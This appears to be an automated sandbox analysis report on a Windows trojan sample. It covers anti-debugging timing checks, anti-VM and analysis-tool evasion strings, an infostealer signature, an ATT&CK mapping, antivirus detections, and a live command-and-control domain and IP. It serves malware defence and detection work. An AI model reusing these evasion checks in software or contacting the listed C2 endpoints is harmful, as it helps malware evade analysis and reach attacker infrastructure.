Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1468 second address: 71F1480 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movzx esi, bx 0x00000012 mov edi, 475D36D0h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1480 second address: 71F14BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c jmp 00007F78B9095CF0h 0x00000011 mov dword ptr [edx+34h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movsx edx, ax 0x0000001a mov bx, cx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F14BA second address: 71F1531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F78B909B107h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test ecx, 00000700h 0x00000013 jmp 00007F78B909B106h 0x00000018 jne 00007F7929069318h 0x0000001e jmp 00007F78B909B100h 0x00000023 or dword ptr [edx+38h], FFFFFFFFh 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jmp 00007F78B909B0FDh 0x0000002f call 00007F78B909B100h 0x00000034 pop esi 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1531 second address: 71F159C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000d jmp 00007F78B9095CF0h 0x00000012 or dword ptr [edx+40h], FFFFFFFFh 0x00000016 pushad 0x00000017 mov si, F00Dh 0x0000001b mov di, si 0x0000001e popad 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007F78B9095CF1h 0x00000028 pushfd 0x00000029 jmp 00007F78B9095CF0h 0x0000002e sbb al, FFFFFF88h 0x00000031 jmp 00007F78B9095CEBh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 7240C49 second address: 7240C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B909B104h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 7240C61 second address: 7240C65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71E0771 second address: 71E07AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B109h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ah, bh 0x00000011 jmp 00007F78B909B104h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 7180051 second address: 7180058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 7180058 second address: 71800A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B109h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bh, 51h 0x0000000f pushfd 0x00000010 jmp 00007F78B909B104h 0x00000015 add eax, 41C93BE8h 0x0000001b jmp 00007F78B909B0FBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71800A3 second address: 71800D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F78B9095CEDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71800D1 second address: 718010C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F78B909B0FDh 0x0000000b xor cl, 00000066h 0x0000000e jmp 00007F78B909B101h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F78B909B0FDh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 718010C second address: 7180112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 7180A66 second address: 7180A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 7180A6C second address: 7180A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 7180A70 second address: 7180A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71D0B21 second address: 71D0B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71B0008 second address: 71B000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71B000C second address: 71B0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71B0012 second address: 71B00C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F78B909B0FEh 0x0000000f push eax 0x00000010 jmp 00007F78B909B0FBh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F78B909B104h 0x0000001d or cx, 57C8h 0x00000022 jmp 00007F78B909B0FBh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F78B909B108h 0x0000002e add ax, 5A28h 0x00000033 jmp 00007F78B909B0FBh 0x00000038 popfd 0x00000039 popad 0x0000003a mov ebp, esp 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushad 0x00000040 popad 0x00000041 pushfd 0x00000042 jmp 00007F78B909B101h 0x00000047 adc cl, 00000046h 0x0000004a jmp 00007F78B909B101h 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71B00C0 second address: 71B0102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF0h 0x0000000c jmp 00007F78B9095CEEh 0x00000011 sub esp, 44h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F78B9095CF7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71B0102 second address: 71B0155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov bx, 23B6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F78B909B0FFh 0x00000016 pop eax 0x00000017 pushfd 0x00000018 jmp 00007F78B909B109h 0x0000001d adc cx, 8FC6h 0x00000022 jmp 00007F78B909B101h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71B0155 second address: 71B0165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B9095CECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71B0278 second address: 71B02F9 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx eax, di 0x00000009 popad 0x0000000a mov dword ptr [esp+24h], 00000000h 0x00000012 jmp 00007F78B909B107h 0x00000017 lock bts dword ptr [edi], 00000000h 0x0000001c jmp 00007F78B909B106h 0x00000021 jc 00007F792961D26Dh 0x00000027 pushad 0x00000028 mov al, 4Fh 0x0000002a pushfd 0x0000002b jmp 00007F78B909B103h 0x00000030 jmp 00007F78B909B103h 0x00000035 popfd 0x00000036 popad 0x00000037 pop edi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov dx, 2596h 0x0000003f mov eax, edx 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71B02F9 second address: 71B031C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71B031C second address: 71B0320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71B0320 second address: 71B0324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71B0324 second address: 71B032A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71B032A second address: 71B0360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, C7h 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jmp 00007F78B9095CF9h 0x00000011 mov esp, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F78B9095CEDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71E07F1 second address: 71E07F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71E07F5 second address: 71E07FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71E07FB second address: 71E081D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B104h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ch, dh 0x0000000f mov di, ax 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71E081D second address: 71E08A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F78B9095CF1h 0x00000009 and ecx, 5915B2F6h 0x0000000f jmp 00007F78B9095CF1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F78B9095CF9h 0x00000022 jmp 00007F78B9095CEBh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F78B9095CF8h 0x0000002e add ecx, 1AFD95A8h 0x00000034 jmp 00007F78B9095CEBh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71E08A3 second address: 71E08A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71E08A9 second address: 71E08D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F78B9095CF5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71E08D2 second address: 71E08D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71E08D8 second address: 71E08DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71E08DC second address: 71E091A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov di, 2A68h 0x0000000f jmp 00007F78B909B101h 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F78B909B108h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71E091A second address: 71E091E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71E091E second address: 71E0924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71E0924 second address: 71E092A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71E092A second address: 71E092E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSpecial instruction interceptor: First address: E9F99C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSpecial instruction interceptor: First address: 104FA2B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00959980 rdtsc 0_2_00959980
Source: C:\Users\user\Desktop\jklg6EIhyR.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_0077255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0077255D
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_007729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_007729FF
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_0077255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0077255D
Source: jklg6EIhyR.exe, jklg6EIhyR.exe, 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: jklg6EIhyR.exeBinary or memory string: Hyper-V RAW
Source: jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: jklg6EIhyR.exe, 00000000.00000003.1414942266.0000000001862000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000003.1414747934.0000000001861000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000003.1414624645.0000000001854000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1431707907.0000000001866000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000003.1414990007.0000000001865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: jklg6EIhyR.exe, 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\jklg6EIhyR.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\jklg6EIhyR.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\jklg6EIhyR.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\jklg6EIhyR.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\jklg6EIhyR.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\jklg6EIhyR.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\jklg6EIhyR.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\jklg6EIhyR.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\jklg6EIhyR.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\jklg6EIhyR.exeFile opened: NTICE
Source: C:\Users\user\Desktop\jklg6EIhyR.exeFile opened: SICE
Source: C:\Users\user\Desktop\jklg6EIhyR.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\jklg6EIhyR.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00959980 rdtsc 0_2_00959980
Source: jklg6EIhyR.exe, jklg6EIhyR.exe, 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\jklg6EIhyR.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
jklg6EIhyR.exe51%VirustotalBrowse
jklg6EIhyR.exe71%ReversingLabsWin32.Trojan.Amadey
jklg6EIhyR.exe100%AviraTR/Crypt.TPM.Gen
jklg6EIhyR.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm17345798505a1100%Avira URL Cloudmalware
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.twentytk20ht.top
185.121.15.192
truefalse
    		high
    httpbin.org
    		34.226.108.155
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850false
        		high
        http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0true
        • Avira URL Cloud: malware
        		unknown
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmljklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            http://html4/loose.dtdjklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm17345798505a1jklg6EIhyR.exe, 00000000.00000003.1415306880.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1431509799.00000000017F9000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://httpbin.org/ipbeforejklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                https://curl.se/docs/http-cookies.htmljklg6EIhyR.exe, jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  https://curl.se/docs/hsts.html#jklg6EIhyR.exefalse
                    		high
                    http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwYjklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      https://curl.se/docs/alt-svc.htmljklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://.cssjklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://.jpgjklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpfalse
                              		high

                              World Map of Contacted IPs

